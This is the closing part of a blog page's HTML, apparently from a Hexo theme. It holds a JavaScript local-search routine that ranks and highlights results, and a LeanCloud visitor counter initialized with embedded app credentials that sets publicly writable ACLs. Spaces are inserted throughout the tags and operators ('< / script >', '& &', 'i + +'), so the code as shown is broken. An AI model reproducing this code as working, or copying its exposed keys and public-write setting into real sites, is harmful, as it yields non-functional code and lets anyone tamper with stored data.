word = item.word;
if (wordEnd > position) {
index.pop();
} else {
break;
}
}
}
searchTextCount += searchTextCountInSlice;
return {
hits: hits,
start: start,
end: end,
searchTextCount: searchTextCountInSlice
};
}
var slicesOfTitle = [];
if (indexOfTitle.length != 0) {
slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
}
var slicesOfContent = [];
while (indexOfContent.length != 0) {
var item = indexOfContent[indexOfContent.length - 1];
var position = item.position;
var word = item.word;
// cut out 100 characters
var start = position - 20;
var end = position + 80;
if(start < 0 ) {
start = 0;
}
if (end < position + word . length ) {
end = position + word.length;
}
if(end > content.length){
end = content.length;
}
slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
}
// sort slices in content by search text's count and hits' count
slicesOfContent.sort(function (sliceLeft, sliceRight) {
if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
return sliceRight.searchTextCount - sliceLeft.searchTextCount;
} else if (sliceLeft.hits.length !== sliceRight.hits.length) {
return sliceRight.hits.length - sliceLeft.hits.length;
} else {
return sliceLeft.start - sliceRight.start;
}
});
// select top N slices in content
var upperBound = parseInt('1');
if (upperBound >= 0) {
slicesOfContent = slicesOfContent.slice(0, upperBound);
}
// highlight title and content
function highlightKeyword(text, slice) {
var result = '';
var prevEnd = slice.start;
slice.hits.forEach(function (hit) {
result += text.substring(prevEnd, hit.position);
var end = hit.position + hit.length;
result += '< b class = "search-keyword" > ' + text.substring(hit.position, end) + '< / b > ';
prevEnd = end;
});
result += text.substring(prevEnd, slice.end);
return result;
}
var resultItem = '';
if (slicesOfTitle.length != 0) {
resultItem += "< li > < a href = '" + articleUrl + "' class = 'search-result-title' > " + highlightKeyword(title, slicesOfTitle[0]) + "< / a > ";
} else {
resultItem += "< li > < a href = '" + articleUrl + "' class = 'search-result-title' > " + title + "< / a > ";
}
slicesOfContent.forEach(function (slice) {
resultItem += "< a href = '" + articleUrl + "' > " +
"< p class = \"search-result\" > " + highlightKeyword(content, slice) +
"...< / p > " + "< / a > ";
});
resultItem += "< / li > ";
resultItems.push({
item: resultItem,
searchTextCount: searchTextCount,
hitCount: hitCount,
id: resultItems.length
});
}
})
};
if (keywords.length === 1 & & keywords[0] === "") {
resultContent.innerHTML = '< div id = "no-result" > < i class = "fa fa-search fa-5x" / > < / div > '
} else if (resultItems.length === 0) {
resultContent.innerHTML = '< div id = "no-result" > < i class = "fa fa-frown-o fa-5x" / > < / div > '
} else {
resultItems.sort(function (resultLeft, resultRight) {
if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
return resultRight.searchTextCount - resultLeft.searchTextCount;
} else if (resultLeft.hitCount !== resultRight.hitCount) {
return resultRight.hitCount - resultLeft.hitCount;
} else {
return resultRight.id - resultLeft.id;
}
});
var searchResultList = '< ul class = \"search-result-list\" > ';
resultItems.forEach(function (result) {
searchResultList += result.item;
})
searchResultList += "< / ul > ";
resultContent.innerHTML = searchResultList;
}
}
if ('auto' === 'auto') {
input.addEventListener('input', inputEventFunction);
} else {
$('.search-icon').click(inputEventFunction);
input.addEventListener('keypress', function (event) {
if (event.keyCode === 13) {
inputEventFunction();
}
});
}
// remove loading animation
$(".local-search-pop-overlay").remove();
$('body').css('overflow', '');
proceedsearch();
}
});
}
// handle and trigger popup window;
$('.popup-trigger').click(function(e) {
e.stopPropagation();
if (isfetched === false) {
searchFunc(path, 'local-search-input', 'local-search-result');
} else {
proceedsearch();
};
});
$('.popup-btn-close').click(onPopupClose);
$('.popup').click(function(e){
e.stopPropagation();
});
$(document).on('keyup', function (event) {
var shouldDismissSearchPopup = event.which === 27 & &
$('.search-popup').is(':visible');
if (shouldDismissSearchPopup) {
onPopupClose();
}
});
< / script >
< script src = "https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js" > < / script >
< script > AV . initialize ( "EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz" , "x8FxDrYG79C8YFrTww9ljo8K" ) ; < / script >
< script >
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length ; i + + ) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length ; i + + ) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
< / script >
< / body >
< / html >